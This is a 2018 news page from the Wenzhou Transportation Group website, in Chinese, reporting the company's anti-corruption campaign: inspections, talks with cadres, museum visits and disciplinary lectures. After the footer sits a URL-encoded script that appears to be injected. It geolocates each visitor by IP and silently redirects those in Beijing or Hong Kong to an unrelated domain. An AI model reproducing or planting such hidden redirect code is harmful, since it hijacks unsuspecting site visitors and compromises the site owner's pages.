当前位置: 您当前的位置 : 温州交运集团 > 交运资讯 > 党建园地 >正文
多措并举建设“清廉交运”
来源: 发布时间:2018年12月19日 11:12:37 作者: 字体:

  专项督查落实整改“全覆盖”

  近日,集团纪委组织精干力量,组成专项督查组,围绕各所属单位办公用房的使用情况和整改情况,开展办公用房“回头看”专项督查,建立了办公用房使用情况数据库,实现监督检查“全覆盖”。

  谈心提醒加强干部自我约束

  12月11日,汽服公司党总支开展面对面集体谈心提醒活动,公司党总支书记陈广群及各支部书记参加,按照“见人见事见思想”的原则,点评了2018年工作情况,指出不足给与建议。

  参观学习提高拒腐防变能力

  11月30日,交通技校组织参观温州道德馆,深化作风建设,增强廉洁自律意识,提高拒腐防变能力,营造风清气正新氛围。大家认真聆听讲解,了解每一件展品背后的动人故事,并表示要以道德风尚的榜样力量引领,做一个正能量的传播者,进一步坚定理想信念,忠诚履行职责,增强新时代意识。

  12月4日下午,城际公司组织参观法治教育基地,通过观看各个展厅的宣传片,结合宣讲员的细致讲解,深刻了解了近年来检察机关查办的贪污贿赂、渎职侵权等职务犯罪的典型案例。大家纷纷表示,要将廉洁自律转化为个人的道德自觉和行动自觉,从行动上防微杜渐,扎实做好本职工作。

  警示教育强化党风廉政建设

  近日,汽服公司邀请市纪委主任吴正杰为党员干部上了一堂精彩的党风廉政建设和反腐微党课,从当前反腐倡廉的总体形势、国有企业反腐倡廉存在的问题、国企职务犯罪的特点及犯罪案例分析等方面讲解了国企廉政建设的重要性,并指出国企已成为反腐的“第二战场”。

  12月7日,交通技校召开“清廉交运”宣传教育会,从认清形势、切实增强党风廉政和廉洁自律意识,学习典型案例、开展党风廉政和反腐倡廉警示教育,加强党风廉政和反腐倡廉讲述了党风廉政和反腐倡廉工作,引导党员干部梳理正确的人生观、价值观、权力观和荣辱观,营造良好党风廉政文化氛围。

交运资讯

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E